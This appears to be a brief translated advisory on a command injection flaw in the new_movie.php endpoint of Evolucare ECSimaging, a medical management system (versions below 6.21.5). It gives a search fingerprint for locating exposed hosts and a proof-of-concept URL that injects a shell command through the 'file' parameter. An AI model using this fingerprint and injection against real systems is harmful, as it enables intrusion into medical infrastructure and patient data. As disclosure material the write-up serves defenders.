Evolucare Ecsimaging New_movie Php Remote Command Execution Vulnerability
Evolucare Ecsimaging New_movie Php Remote Command Execution Vulnerability
Evolucare Ecsimaging new_movie.php Remote command execution vulnerability
Vulnerability Description
EVOLUCARE ECSimage is a medical management system used abroad. Research has found that there is a command injection vulnerability in its new_movie.php interface, and attackers can use this vulnerability to obtain system sensitive information, etc.
Vulnerability Impact
EVOLUCARE Evolucare Ecsimaging version < 6.21.5
Network surveying and mapping
body=”ECSimaging”
Vulnerability reappears
Login page
Verify POC
1
/new_movie.php?studyUID=1&start=2&end=2&file=1;pwd
This post is licensed under CC BY 4.0 by the author.